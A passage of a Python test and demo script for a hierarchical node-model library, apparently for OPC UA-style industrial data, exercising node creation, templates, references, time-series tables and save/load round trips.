m.create_node("2",name="second")
m.create_node("root",name="myreferencer",type="referencer")
m.create_node("root.folder1",name="myvar",type="variable")
m.set_value("root.folder1.myvar",44.5)
m.add_forward_refs("root.myreferencer",["root.folder1"])
m.add_property("root.folder1.folder2","uasource","192.168.5.6")
m.show()
m.get_model()
m.delete_node("root.myreferencer")
return m
def test_template():
m=Model()
template = {
"myfunction": {
"type": "function",
"value": "someValue",
"opcua":"opc.tcp://129.160.1.1:4880::n2=2;s=mystrin"
},
"myreferencer": {
"type": "referencer",
"forwardRefs": ['.myfolder.var1', '.myfolder.var2', '.myfolder.var3']
},
"myfolder": {
"type": "folder",
"children": {
"var1": {"type": "const", "value": "1"},
"var2": {"type": "variable"},
"var3": {"type": "timeseries"},
}
},
}
m.create_nodes_from_template(template=template)
m.show()
def save_test():
print("save and load test")
m=Model()
m.create_test()
m.save("savetest")
n=Model()
n.load("savetest")
if len(n.get_model())!= len(m.get_model()):
print("unequal size")
return False
#now compare
mModel = m.get_model()
nModel = n.get_model()
for nodeId in mModel:
#print("check",nodeId)
try:
if nModel[nodeId]!=mModel[nodeId]:
print("unequal before after ",nodeId,m[nodeId],n[nodeId])
return False
except:
print("cant find",nodeId)
return False
print("savetest passed")
return True
def plugintest():
m=Model()
m.create_node("root", name="folder1")
m.create_nodes_from_template("root.folder1",m.templates["testfunction.delayFunctionTemplate"])
m.show()
m.execute_function("root.folder1.delayFunction")
statusNode = m.get_node("root.folder1.delayFunction.status")
progressNode = m.get_node("root.folder1.delayFunction.progress")
while(statusNode.get_value()!="finished"):
print("progress is",progressNode.get_value())
time.sleep(0.3)
print("execution re===================")
m.show()
def getnodetest():
m=Model()
m.create_node("root", name="folder1")
m.create_node("root.folder1", name="folder2")
m.create_node("root.folder1", name="myvar", type="variable")
myvar = m.get_node("root.folder1.myvar")
myvar.set_value(33)
print("value",myvar.get_value())
def testfunctions_test():
m = Model()
m.create_test(1)
m.show()
table= m.get_timeseries_table(["root.variables.f0","root.variables.f1","root.variables.time"],noBins=25)
print("shape",table.shape)
for row in table.T:
for elem in row:
print(str("%3.7f"%elem)," ",end="")
print("")
def time_conver_test():
d1=datetime.datetime(2018,1,1,0,0,0,tzinfo = pytz.UTC)
print(d1)
s1 = date2secs(d1)
print(s1)
d2 = secs2date(s1)
print(d2)
d3 ="2018-01-01T00:10:08.445+02:00"
print(d3)
d4=dateutil.parser.parse(d3)
print(d4)
s4=date2secs(d4)
print(s4)
d5=secs2date(s4)
print(d5)
def table_test():
m=Model()
print("this test creates a table and writes some data in")
template = [
{
"name": "type",
"type": "const",
"value": "timeSeriesTable"
},
{
"name":"description",
"type": "const",
"value": "this is a great table"
},
{
"name":"data",
"type":"folder",
"children":[
{"name":"var1","type": "column","value":[]},
{"name":"var2","type": "column","value":[]},
{"name":"var3","type": "column","value":[]},
{"name":"time","type": "column","value":[]}
]
},
{
"name":"columns",
"type": "referencer",
"forwardRefs": ['.data.var1', '.data.var2', '.data.var3',".data.time"]
},
{
"name":"timeField",
"type": "referencer",
"forwardRefs":['.data.time']
},
{
"name": "numberOfRows",
"type": "variable",
"value":0
}
]
m.create_node("root", name="mytable",type="table")
m.create_nodes_from_template("root.mytable",template=template)
m.show()
#now write some data with autocreates
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.mytable.data.var1":1,"root.mytable.data.var2":2,"root.mytable.data.time":myepoch,"root.mytable.data.newvar":99}
m.append_table(blob)
m.show()
#now add more data but leave out var
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.time": myepoch}
m.append_table(blob)
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.var4": 4, "root.mytable.data.time": myepoch}
m.append_table(blob)
m.show()
def test_table_autocreate():
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.data.var1":1,"root.data.var2":2,"root.folder.time":myepoch,"root.data.newvar":99}
m=Model()
m.append_table(blob)
m.show()
def test_create_from_path():
m=Model()
m.create_node_from_path("root.myfolder.myfolder2.var",{"type":"variable","value":33})
m.show()
def test_get_children():
m=Model()
m.create_test()
nodes = m.get_node_with_children('root.folder2')
#lastnode = '10'
#print(m.get_path(lastnode))
print(json.dumps(nodes,indent=4))
def test_create():
m=Model()
m.create_test(1)
m.show()
def test_get_forwards():#
#in this test, we check the forwards get results over folders, referencers etc.
m=Model()
m.create_node_from_path("root.folder.var1",{"type":"variable"})
m.create_node_from_path("root.folder.var2", {"type": "variable"})
m.create_node_from_path("root.folder.var3", {"type": "variable"})
m.create_node_from_path("root.ref1", {"type": "referencer"})
m.create_node_from_path("root.ref2", {"type": "referencer"})
m.add_forward_refs("root.ref1",["root.folder"])
m.add_forward_refs("root.ref2", ["root.ref1"])
m.show()
res=m.get_leaves("root.ref1")
print(res)
for k in res:
print(k["name"])
res = m.get_leaves("root.ref2")
for k in res:
print(k["name"])
def pickle_save():
import pickle
m=Model()
m.create_test(2)
# write python dict to a file
output = open('pickle_save.pkl', 'wb')
pickle.dump(m.get_model(), output)
output.close()
n=Model()
# read python dict back from the file
pkl_file = open('pickle_save.pkl', 'rb')
restore = pickle.load(pkl_file)
pkl_file.close()
print("compare after pickle restre",restore==m.get_model())
if __name__ == '__main__':
#############
#test1()
#ts_test1()
#test_template()
save_test()
pickle_save()
#plugintest()
#getnodetest()
#table_query_test()
#testfunctions_test()
#time_conver_test()
#test_create_from_path()
#table_test()
#test_table_autocreate()
#test_get_children()
#test_get_forwards()
#test_create()
#read in the commmand line options:
# demo1: create the test for the demo1, and store it in file (option2)
#
if len(sys.argv) > 1:
if sys.argv[1] == "demo1":
fileName = sys.argv[2]
print("creating demo and save as ",fileName)
m = Model()
m.create_test()
m.show()
fileName = sys.argv[2]
m.save(fileName)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.